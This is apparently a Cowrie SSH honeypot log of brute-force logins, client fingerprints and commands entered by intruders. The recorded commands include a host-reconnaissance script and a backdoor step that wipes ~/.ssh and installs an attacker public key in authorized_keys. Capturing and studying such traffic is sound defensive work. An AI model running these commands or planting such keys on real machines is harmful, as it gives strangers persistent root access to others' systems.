{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:16:07.346818Z","src_ip":"212.227.125.160","session":"2b3ac57d8a52"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T11:16:07.347780Z","src_ip":"212.227.125.160","session":"2b3ac57d8a52"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T11:16:07.348564Z","src_ip":"212.227.125.160","session":"2b3ac57d8a52"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:16:07.349322Z","src_ip":"212.227.125.160","session":"2b3ac57d8a52"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:16:07.350416Z","src_ip":"212.227.125.160","session":"2b3ac57d8a52"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:16:07.351475Z","src_ip":"212.227.125.160","session":"2b3ac57d8a52"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:16:07.351989Z","src_ip":"212.227.125.160","session":"2b3ac57d8a52"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T11:16:07.523586Z","src_ip":"212.227.125.160","session":"2b3ac57d8a52"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:16:07.524760Z","src_ip":"212.227.125.160","session":"2b3ac57d8a52"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:16:07.526276Z","src_ip":"212.227.125.160","session":"2b3ac57d8a52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35254,"dst_ip":"1.2.3.4","dst_port":22,"session":"f59298587322","protocol":"ssh","message":"New connection: 212.227.125.160:35254 (1.2.3.4:22) [session: f59298587322]","sensor":"my-vps","timestamp":"2025-08-28T11:16:48.634845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:16:48.707999Z","src_ip":"212.227.125.160","session":"f59298587322"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:16:48.829543Z","src_ip":"212.227.125.160","session":"f59298587322"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:16:49.524921Z","src_ip":"212.227.125.160","session":"f59298587322"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:16:50.031453Z","src_ip":"212.227.125.160","session":"f59298587322"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T11:16:50.032118Z","src_ip":"212.227.125.160","session":"f59298587322"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:16:50.032860Z","src_ip":"212.227.125.160","session":"f59298587322"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:16:50.033920Z","src_ip":"212.227.125.160","session":"f59298587322"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T11:16:50.035621Z","src_ip":"212.227.125.160","session":"f59298587322"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:16:50.036287Z","src_ip":"212.227.125.160","session":"f59298587322"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:16:50.037212Z","src_ip":"212.227.125.160","session":"f59298587322"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T11:16:50.038518Z","src_ip":"212.227.125.160","session":"f59298587322"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T11:16:50.038967Z","src_ip":"212.227.125.160","session":"f59298587322"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:16:50.039610Z","src_ip":"212.227.125.160","session":"f59298587322"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:16:50.040374Z","src_ip":"212.227.125.160","session":"f59298587322"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:16:50.041238Z","src_ip":"212.227.125.160","session":"f59298587322"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:16:50.041593Z","src_ip":"212.227.125.160","session":"f59298587322"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T11:16:50.220792Z","src_ip":"212.227.125.160","session":"f59298587322"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:16:50.221816Z","src_ip":"212.227.125.160","session":"f59298587322"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:16:50.222646Z","src_ip":"212.227.125.160","session":"f59298587322"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":37952,"dst_ip":"1.2.3.4","dst_port":22,"session":"193046dabfac","protocol":"ssh","message":"New connection: 27.112.79.123:37952 (1.2.3.4:22) [session: 193046dabfac]","sensor":"my-vps","timestamp":"2025-08-28T11:16:55.870643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:16:55.871853Z","src_ip":"27.112.79.123","session":"193046dabfac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:16:56.133616Z","src_ip":"27.112.79.123","session":"193046dabfac"}
{"eventid":"cowrie.login.success","username":"root","password":"pass123","message":"login attempt [root/pass123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:16:57.226499Z","src_ip":"27.112.79.123","session":"193046dabfac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:16:57.777823Z","src_ip":"27.112.79.123","session":"193046dabfac"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:16:57.778728Z","src_ip":"27.112.79.123","session":"193046dabfac"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:16:57.779882Z","src_ip":"27.112.79.123","session":"193046dabfac"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:16:58.046792Z","src_ip":"27.112.79.123","session":"193046dabfac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:16:59.063296Z","src_ip":"27.112.79.123","session":"193046dabfac"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:16:59.063966Z","src_ip":"27.112.79.123","session":"193046dabfac"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:16:59.328063Z","src_ip":"27.112.79.123","session":"193046dabfac"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:16:59.328915Z","src_ip":"27.112.79.123","session":"193046dabfac"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":37964,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b9b311b882b","protocol":"ssh","message":"New connection: 27.112.79.123:37964 (1.2.3.4:22) [session: 6b9b311b882b]","sensor":"my-vps","timestamp":"2025-08-28T11:16:59.599041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:16:59.599906Z","src_ip":"27.112.79.123","session":"6b9b311b882b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:16:59.870462Z","src_ip":"27.112.79.123","session":"6b9b311b882b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:17:01.006654Z","src_ip":"27.112.79.123","session":"6b9b311b882b"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:17:02.281135Z","src_ip":"27.112.79.123","session":"6b9b311b882b"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":37972,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1b8849ee1cb","protocol":"ssh","message":"New connection: 27.112.79.123:37972 (1.2.3.4:22) [session: c1b8849ee1cb]","sensor":"my-vps","timestamp":"2025-08-28T11:17:02.551992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:17:02.552910Z","src_ip":"27.112.79.123","session":"c1b8849ee1cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:17:02.823074Z","src_ip":"27.112.79.123","session":"c1b8849ee1cb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:17:03.952488Z","src_ip":"27.112.79.123","session":"c1b8849ee1cb"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:17:04.226047Z","src_ip":"27.112.79.123","session":"c1b8849ee1cb"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:17:04.227159Z","src_ip":"27.112.79.123","session":"193046dabfac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45982,"dst_ip":"1.2.3.4","dst_port":22,"session":"8058dd6105ee","protocol":"ssh","message":"New connection: 212.227.235.229:45982 (1.2.3.4:22) [session: 8058dd6105ee]","sensor":"my-vps","timestamp":"2025-08-28T11:17:18.776212Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46376,"dst_ip":"1.2.3.4","dst_port":22,"session":"e62b2cfe6eee","protocol":"ssh","message":"New connection: 212.227.125.160:46376 (1.2.3.4:22) [session: e62b2cfe6eee]","sensor":"my-vps","timestamp":"2025-08-28T11:17:30.687855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:17:30.688791Z","src_ip":"212.227.125.160","session":"e62b2cfe6eee"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","h